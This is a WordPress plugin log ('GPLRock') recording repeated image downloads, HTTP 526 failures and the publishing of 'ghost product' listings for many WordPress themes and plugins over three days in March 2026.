Image download failed for product brainbizz-finance-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:29 UTC] GPLRock: Image download failed for product brainbizz-finance-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/brainbizz---finance--business-wordpress-theme-27636.webp for product brainbizz-finance-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:41:31 UTC] GPLRock: Image download failed for product brainbizz-finance-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:34 UTC] GPLRock: Image download failed for product brainbizz-finance-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/brainbizz---finance--business-wordpress-theme-27636.webp for product brainbizz-finance-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:41:36 UTC] GPLRock WARNING: Image download failed for product brainbizz-finance-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/brainbizz---finance--business-wordpress-theme-27636.webp [18-Mar-2026 04:41:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: brainbizz-finance-business-wordpress-theme [18-Mar-2026 04:41:38 UTC] GPLRock: Image download failed for product eno-portfolio-agency-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:40 UTC] GPLRock: Image download failed for product eno-portfolio-agency-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eno---portfolio-agency-wordpress-6116.webp for product eno-portfolio-agency-wordpress after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:41:43 UTC] GPLRock: Image download failed for product eno-portfolio-agency-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:45 UTC] GPLRock: Image download failed for product eno-portfolio-agency-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eno---portfolio-agency-wordpress-6116.webp for product eno-portfolio-agency-wordpress after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:41:47 UTC] GPLRock WARNING: Image download failed for product eno-portfolio-agency-wordpress. URL: https://meldwp.com/wp-content/uploads/eno---portfolio-agency-wordpress-6116.webp [18-Mar-2026 04:41:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eno-portfolio-agency-wordpress [18-Mar-2026 04:41:48 UTC] GPLRock: Image download failed for product it-solutions-technology-multi-purpose-elementor-wordpress-theme-agiletech (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:50 UTC] GPLRock: Image download failed for product it-solutions-technology-multi-purpose-elementor-wordpress-theme-agiletech (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/it-solutions--technology-multi-purpose-elementor-wordpress-theme---agiletech-31345.webp for product it-solutions-technology-multi-purpose-elementor-wordpress-theme-agiletech after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:41:52 UTC] GPLRock: Image download failed for product it-solutions-technology-multi-purpose-elementor-wordpress-theme-agiletech (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:54 UTC] GPLRock: Image download failed for product it-solutions-technology-multi-purpose-elementor-wordpress-theme-agiletech (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:41:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/it-solutions--technology-multi-purpose-elementor-wordpress-theme---agiletech-31345.webp for product it-solutions-technology-multi-purpose-elementor-wordpress-theme-agiletech after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:41:57 UTC] GPLRock WARNING: Image download failed for product it-solutions-technology-multi-purpose-elementor-wordpress-theme-agiletech. URL: https://meldwp.com/wp-content/uploads/it-solutions--technology-multi-purpose-elementor-wordpress-theme---agiletech-31345.webp [18-Mar-2026 04:41:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: it-solutions-technology-multi-purpose-elementor-wordpress-theme-agiletech [18-Mar-2026 04:42:04 UTC] GPLRock: Image download failed for product event-hub-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:06 UTC] GPLRock: Image download failed for product event-hub-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/event-hub--event-conference-wordpress-theme-9082.webp for product event-hub-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:42:08 UTC] GPLRock: Image download failed for product event-hub-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:11 UTC] GPLRock: Image download failed for product event-hub-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/event-hub--event-conference-wordpress-theme-9082.webp for product event-hub-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:42:13 UTC] GPLRock WARNING: Image download failed for product event-hub-event-conference-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/event-hub--event-conference-wordpress-theme-9082.webp [18-Mar-2026 04:42:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: event-hub-event-conference-wordpress-theme [18-Mar-2026 04:42:13 UTC] GPLRock: Image download failed for product cosyone-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:15 UTC] GPLRock: Image download failed for product cosyone-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cosyone---multipurpose-woocommerce-theme-27376.webp for product cosyone-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:42:18 UTC] GPLRock: Image download failed for product cosyone-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:20 UTC] GPLRock: Image download failed for product cosyone-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cosyone---multipurpose-woocommerce-theme-27376.webp for product cosyone-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:42:22 UTC] GPLRock WARNING: Image download failed for product cosyone-multipurpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/cosyone---multipurpose-woocommerce-theme-27376.webp [18-Mar-2026 04:42:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cosyone-multipurpose-woocommerce-theme [18-Mar-2026 04:42:23 UTC] GPLRock: Image downloaded successfully for product space-responsive-premium-moodle-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8fd20ac7.webp [18-Mar-2026 04:42:23 UTC] GPLRock: Using pre-downloaded image for product space-responsive-premium-moodle-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8fd20ac7.webp [18-Mar-2026 04:42:23 UTC] GPLRock: Ghost product published with image - Product ID: space-responsive-premium-moodle-theme [18-Mar-2026 04:42:23 UTC] GPLRock: Image download failed for product sanfrancisco-multiconcept-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:26 UTC] GPLRock: Image download failed for product sanfrancisco-multiconcept-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sanfrancisco---multiconcept-blog--magazine-wordpress-theme-8282.webp for product sanfrancisco-multiconcept-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:42:28 UTC] GPLRock: Image download failed for product sanfrancisco-multiconcept-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:30 UTC] GPLRock: Image download failed for product sanfrancisco-multiconcept-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sanfrancisco---multiconcept-blog--magazine-wordpress-theme-8282.webp for product sanfrancisco-multiconcept-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:42:32 UTC] GPLRock WARNING: Image download failed for product sanfrancisco-multiconcept-blog-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sanfrancisco---multiconcept-blog--magazine-wordpress-theme-8282.webp [18-Mar-2026 04:42:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sanfrancisco-multiconcept-blog-magazine-wordpress-theme [18-Mar-2026 04:42:33 UTC] GPLRock: Image downloaded successfully for product news24-elementor-blog-magazine (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d67c09e8.webp [18-Mar-2026 04:42:33 UTC] GPLRock: Using pre-downloaded image for product news24-elementor-blog-magazine: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d67c09e8.webp [18-Mar-2026 04:42:33 UTC] GPLRock: Ghost product published with image - Product ID: news24-elementor-blog-magazine [18-Mar-2026 04:42:33 UTC] GPLRock: Image download failed for product politics-election-campaign-political-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:36 UTC] GPLRock: Image download failed for product politics-election-campaign-political-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/politics---election-campaign-political-wp-theme-7536.webp for product politics-election-campaign-political-wp-theme after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:42:38 UTC] GPLRock: Image download failed for product politics-election-campaign-political-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:40 UTC] GPLRock: Image download failed for product politics-election-campaign-political-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [18-Mar-2026 04:42:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/politics---election-campaign-political-wp-theme-7536.webp for product politics-election-campaign-political-wp-theme after 3 attempts. HTTP Code: 526, Error: [18-Mar-2026 04:42:42 UTC] GPLRock WARNING: Image download failed for product politics-election-campaign-political-wp-theme. URL: https://meldwp.com/wp-content/uploads/politics---election-campaign-political-wp-theme-7536.webp [18-Mar-2026 04:42:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: politics-election-campaign-political-wp-theme [18-Mar-2026 04:42:49 UTC] GPLRock: Image downloaded successfully for product affiliatewp-affiliate-forms-for-gravity-forms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-51cca6cf.jpg [18-Mar-2026 04:42:49 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-affiliate-forms-for-gravity-forms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-51cca6cf.jpg [18-Mar-2026 04:42:49 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-affiliate-forms-for-gravity-forms [18-Mar-2026 04:42:51 UTC] GPLRock: Image downloaded successfully for product affiliatewp-custom-affiliate-slugs (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b85853d9.jpg [18-Mar-2026 04:42:51 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-custom-affiliate-slugs: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b85853d9.jpg [18-Mar-2026 04:42:51 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-custom-affiliate-slugs [18-Mar-2026 04:42:52 UTC] GPLRock: Image downloaded successfully for product affiliatewp-rest-api-extended (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ee83df84.jpg [18-Mar-2026 04:42:52 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-rest-api-extended: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ee83df84.jpg [18-Mar-2026 04:42:52 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-rest-api-extended [18-Mar-2026 04:42:54 UTC] GPLRock: Image downloaded successfully for product affiliatewp-zapier-for-affiliatewp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6585022d.jpg [18-Mar-2026 04:42:54 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-zapier-for-affiliatewp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6585022d.jpg [18-Mar-2026 04:42:54 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-zapier-for-affiliatewp [18-Mar-2026 04:42:56 UTC] GPLRock: Image downloaded successfully for product affiliatewp-pushover-notifications (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-26868eb6.jpg [18-Mar-2026 04:42:56 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-pushover-notifications: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-26868eb6.jpg [18-Mar-2026 04:42:56 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-pushover-notifications [18-Mar-2026 04:42:57 UTC] GPLRock: Image downloaded successfully for product affiliatewp-affiliate-dashboard-sharing (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-597909ee.jpg [18-Mar-2026 04:42:57 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-affiliate-dashboard-sharing: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-597909ee.jpg [18-Mar-2026 04:42:57 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-affiliate-dashboard-sharing [18-Mar-2026 04:42:59 UTC] GPLRock: Image downloaded successfully for product affiliatewp-paypal-payouts (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dbfcfad3.jpg [18-Mar-2026 04:42:59 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-paypal-payouts: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dbfcfad3.jpg [18-Mar-2026 04:42:59 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-paypal-payouts [18-Mar-2026 04:43:00 UTC] GPLRock: Image downloaded successfully for product affiliatewp-lifetime-commissions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c7a7c383.jpg [18-Mar-2026 04:43:00 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-lifetime-commissions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c7a7c383.jpg [18-Mar-2026 04:43:00 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-lifetime-commissions [18-Mar-2026 04:43:02 UTC] GPLRock: Image downloaded successfully for product affiliatewp-direct-link-tracking (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f4773b3e.jpg [18-Mar-2026 04:43:02 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-direct-link-tracking: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f4773b3e.jpg [18-Mar-2026 04:43:02 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-direct-link-tracking [18-Mar-2026 04:43:04 UTC] GPLRock: Image downloaded successfully for product affiliatewp-affiliate-landing-pages (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-670ee951.jpg [18-Mar-2026 04:43:04 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-affiliate-landing-pages: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-670ee951.jpg [18-Mar-2026 04:43:04 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-affiliate-landing-pages [19-Mar-2026 01:21:16 UTC] GPLRock: Image downloaded successfully for product appthemes-classipress-wordpress-classified-ads-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6c30015d.jpg [19-Mar-2026 01:21:16 UTC] GPLRock: Using pre-downloaded image for product appthemes-classipress-wordpress-classified-ads-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6c30015d.jpg [19-Mar-2026 01:21:16 UTC] GPLRock: Ghost product published with image - Product ID: appthemes-classipress-wordpress-classified-ads-theme [19-Mar-2026 01:21:18 UTC] GPLRock: Image downloaded successfully for product norebro-creative-portfolio-theme-for-multipurpose-usage (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df72183f.jpg [19-Mar-2026 01:21:18 UTC] GPLRock: Using pre-downloaded image for product norebro-creative-portfolio-theme-for-multipurpose-usage: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df72183f.jpg [19-Mar-2026 01:21:18 UTC] GPLRock: Ghost product published with image - Product ID: norebro-creative-portfolio-theme-for-multipurpose-usage [19-Mar-2026 01:21:19 UTC] GPLRock: Image downloaded successfully for product woocommerce-chained-products (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b13e5325.jpg [19-Mar-2026 01:21:19 UTC] GPLRock: Using pre-downloaded image for product woocommerce-chained-products: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b13e5325.jpg [19-Mar-2026 01:21:19 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-chained-products [19-Mar-2026 01:21:20 UTC] GPLRock: Image downloaded successfully for product kadence-blocks-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2209ae01.jpg [19-Mar-2026 01:21:21 UTC] GPLRock: Using pre-downloaded image for product kadence-blocks-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2209ae01.jpg [19-Mar-2026 01:21:21 UTC] GPLRock: Ghost product published with image - Product ID: kadence-blocks-pro [19-Mar-2026 01:21:22 UTC] GPLRock: Image downloaded successfully for product auto-showroom-car-dealership-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-18cc692a.jpg [19-Mar-2026 01:21:22 UTC] GPLRock: Using pre-downloaded image for product auto-showroom-car-dealership-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-18cc692a.jpg [19-Mar-2026 01:21:22 UTC] GPLRock: Ghost product published with image - Product ID: auto-showroom-car-dealership-wordpress-theme [19-Mar-2026 01:21:24 UTC] GPLRock: Image downloaded successfully for product ranbron-business-and-consulting-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87b7033e.jpg [19-Mar-2026 01:21:24 UTC] GPLRock: Using pre-downloaded image for product ranbron-business-and-consulting-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87b7033e.jpg [19-Mar-2026 01:21:24 UTC] GPLRock: Ghost product published with image - Product ID: ranbron-business-and-consulting-wordpress-theme [19-Mar-2026 01:21:25 UTC] GPLRock: Image downloaded successfully for product academia-education-center-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4baee305.jpg [19-Mar-2026 01:21:25 UTC] GPLRock: Using pre-downloaded image for product academia-education-center-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4baee305.jpg [19-Mar-2026 01:21:25 UTC] GPLRock: Ghost product published with image - Product ID: academia-education-center-wordpress-theme [19-Mar-2026 01:21:27 UTC] GPLRock: Image downloaded successfully for product crypterio-ico-landing-page-and-cryptocurrency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e78bc10d.jpg [19-Mar-2026 01:21:27 UTC] GPLRock: Using pre-downloaded image for product crypterio-ico-landing-page-and-cryptocurrency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e78bc10d.jpg [19-Mar-2026 01:21:27 UTC] GPLRock: Ghost product published with image - Product ID: crypterio-ico-landing-page-and-cryptocurrency-wordpress-theme [19-Mar-2026 01:21:28 UTC] GPLRock: Image downloaded successfully for product yungen-modern-digital-agency-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5da306f.avif [19-Mar-2026 01:21:29 UTC] GPLRock: Using pre-downloaded image for product yungen-modern-digital-agency-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5da306f.avif [19-Mar-2026 01:21:29 UTC] GPLRock: Ghost product published with image - Product ID: yungen-modern-digital-agency-business-wordpress-theme [19-Mar-2026 01:21:30 UTC] GPLRock: Image downloaded successfully for product windsor-apartment-complex-single-property-site-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4b6be74.jpg [19-Mar-2026 01:21:30 UTC] GPLRock: Using pre-downloaded image for product windsor-apartment-complex-single-property-site-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4b6be74.jpg [19-Mar-2026 01:21:30 UTC] GPLRock: Ghost product published with image - Product ID: windsor-apartment-complex-single-property-site-template [20-Mar-2026 01:33:58 UTC] GPLRock: Image downloaded successfully for product asaya-yoga-meditation-elementor-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90acfd4f.webp [20-Mar-2026 01:33:58 UTC] GPLRock: Using pre-downloaded image for product asaya-yoga-meditation-elementor-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90acfd4f.webp [20-Mar-2026 01:33:58 UTC] GPLRock: Ghost product published with image - Product ID: asaya-yoga-meditation-elementor-kit [20-Mar-2026 01:33:59 UTC] GPLRock: Image downloaded successfully for product bigcart-clean-modern-wordpress-theme-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2096cec9.webp [20-Mar-2026 01:33:59 UTC] GPLRock: Using pre-downloaded image for product bigcart-clean-modern-wordpress-theme-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2096cec9.webp [20-Mar-2026 01:33:59 UTC] GPLRock: Ghost product published with image - Product ID: bigcart-clean-modern-wordpress-theme-for-woocommerce [20-Mar-2026 01:33:59 UTC] GPLRock: Image download failed for product zenit-clean-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:33:59 UTC] GPLRock: Image downloaded successfully for product artsy-tattoo-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5360bf87.webp [20-Mar-2026 01:34:00 UTC] GPLRock: Using pre-downloaded image for product artsy-tattoo-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5360bf87.webp [20-Mar-2026 01:34:00 UTC] GPLRock: Ghost product published with image - Product ID: artsy-tattoo-studio-elementor-template-kit [20-Mar-2026 01:34:01 UTC] GPLRock: Image downloaded successfully for product artsea-photography-art-gallery-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e9c00d48.webp [20-Mar-2026 01:34:01 UTC] GPLRock: Using pre-downloaded image for product artsea-photography-art-gallery-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e9c00d48.webp [20-Mar-2026 01:34:01 UTC] GPLRock: Ghost product published with image - Product ID: artsea-photography-art-gallery-elementor-template-kit [20-Mar-2026 01:34:01 UTC] GPLRock: Image download failed for product zenit-clean-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:02 UTC] GPLRock: Image downloaded successfully for product artore-theater-entertainment-performing-arts-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0fcef1c.webp [20-Mar-2026 01:34:02 UTC] GPLRock: Using pre-downloaded image for product artore-theater-entertainment-performing-arts-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0fcef1c.webp [20-Mar-2026 01:34:02 UTC] GPLRock: Ghost product published with image - Product ID: artore-theater-entertainment-performing-arts-elementor-template-kit [20-Mar-2026 01:34:03 UTC] GPLRock: Image downloaded successfully for product arton-beauty-spa-salon-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a6e8f02.webp [20-Mar-2026 01:34:03 UTC] GPLRock: Using pre-downloaded image for product arton-beauty-spa-salon-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a6e8f02.webp [20-Mar-2026 01:34:03 UTC] GPLRock: Ghost product published with image - Product ID: arton-beauty-spa-salon-template-kit [20-Mar-2026 01:34:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zenit---clean-photography-wordpress-theme-25668.webp for product zenit-clean-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:03 UTC] GPLRock: Image download failed for product zenit-clean-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:04 UTC] GPLRock: Image downloaded successfully for product artion-content-copywriting-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf93c38a.webp [20-Mar-2026 01:34:05 UTC] GPLRock: Using pre-downloaded image for product artion-content-copywriting-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf93c38a.webp [20-Mar-2026 01:34:05 UTC] GPLRock: Ghost product published with image - Product ID: artion-content-copywriting-services-elementor-template-kit [20-Mar-2026 01:34:06 UTC] GPLRock: Image download failed for product zenit-clean-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zenit---clean-photography-wordpress-theme-25668.webp for product zenit-clean-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 01:34:08 UTC] GPLRock WARNING: Image download failed for product zenit-clean-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zenit---clean-photography-wordpress-theme-25668.webp [20-Mar-2026 01:34:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zenit-clean-photography-wordpress-theme [20-Mar-2026 01:34:08 UTC] GPLRock: Image downloaded successfully for product arthoz-art-exhibition-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4af3120.webp [20-Mar-2026 01:34:08 UTC] GPLRock: Using pre-downloaded image for product arthoz-art-exhibition-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4af3120.webp [20-Mar-2026 01:34:08 UTC] GPLRock: Ghost product published with image - Product ID: arthoz-art-exhibition-elementor-template-kit [20-Mar-2026 01:34:08 UTC] GPLRock: Image downloaded successfully for product go-courier-delivery-transport-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4f026237.webp [20-Mar-2026 01:34:08 UTC] GPLRock: Using pre-downloaded image for product go-courier-delivery-transport-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4f026237.webp [20-Mar-2026 01:34:08 UTC] GPLRock: Ghost product published with image - Product ID: go-courier-delivery-transport-wordpress-theme [20-Mar-2026 01:34:08 UTC] GPLRock: Image download failed for product umbala-fashion-clothing-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 01:34:09 UTC] GPLRock: Image downloaded successfully for product artec-architecture-elementor-template-kit (attempt 1) to: 